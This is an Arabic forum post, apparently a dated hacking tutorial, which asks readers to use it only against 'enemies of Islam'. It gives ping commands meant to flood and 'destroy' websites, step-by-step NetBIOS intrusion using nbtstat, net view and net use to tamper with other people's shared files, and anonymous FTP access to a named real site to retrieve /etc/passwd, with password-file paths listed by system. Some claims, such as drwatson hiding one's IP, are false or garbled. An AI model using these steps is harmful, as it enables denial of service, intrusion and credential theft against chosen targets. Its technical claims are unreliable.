هذا الموضوع خطير جدا أرجو عدم الأستخدام إلامن هوعدوللإسلام و المسلمين... اخطر واغرب الأوامر بالدوس للهكر: لتدمير المواقع: ping -t www.***.com هذا الأمر يقوم بالضغط على المضيف ping -t -a -f www.***.com أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف ping www.***.com وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي com/com.wav com3/com3/.wav com1/com.wav وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل ping -w timeout www.***.com وهذا الامر يستعمل لمعرفة سرعة المواقع NETSTAT -S هذه المنافذ في جهازك NETSTAT -A هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك NETSTAT -N هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت NETSTAT -P هذا منافذ البروتكوكل drwatson هذا الامر لأخفاء الاي بي والان هذه اوامر خطيرة الإختراق عن طريق NetBios Attack هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة. وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack" 1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى). 2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس . 3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER . 4- سيظهر لك الجدول التالى : NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------------- J-1 <00> UNIQUE Registered WORK <00> GROUP Registered J-1 <03> UNIQUE Registered J-1 <20> UNIQUE Registered WORK <1E> GROUP Registered WORK <1D> UNIQUE Registered __MSBROWSE__.<01>GROUP Registered ملحوظة : تم حذف المعلومات الأصلية من الجدول . 5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه. 6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس: Net view \\<insert ip_address here> 7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها : Shared resources at \\ip_address Sharename Type Comment MY ********S Disk TEMP Disk 8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه : Net use x: \\<insert IP address here>\temp طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق .. * لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع User name-Password وهما يكونان محفوظين في ملف يسمي PASSWD غالبا بعض المواقع تضع هذا الملف في الإف تي بي ما هو إف تي بي؟ FTP=File Transfer Protocol بروتوكول نقل الملفات تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت start==>run إبدأ ثم تشغيل واكتب telnet سيفتح التلنت اضغط علىRemote System ==> connect ثم اكتب الموقع في Host Name مثلا kahane.org أو الآيبي الخاص به وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي ثم اضغط connect وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code user anonymous ثم انتر بعدها يطلب السيرفر كلمة السر اكتب [email protected] اكتب أي بريد ككلمة سر وطبعا سيكون وهميا ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح.. بعدها سنحصل على ملف الباسوورد قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل cute ftp - ws_ftp مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان ftp.kahane.org لتحصل على الملف في التلنت اكتب retr /etc/passwd /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها:: تحيتي... [IMG]http://www2.0zz0.com/2006/08/17/858791495.gif[/IMG.] البرنامج المذكور أعلاه تجدونه في هذا الموقع. www.alamal-tv.com أو هذا الموقع: www.mshakel.com
مشكووووووووووووور وماقصرت
قوانين المنتدى
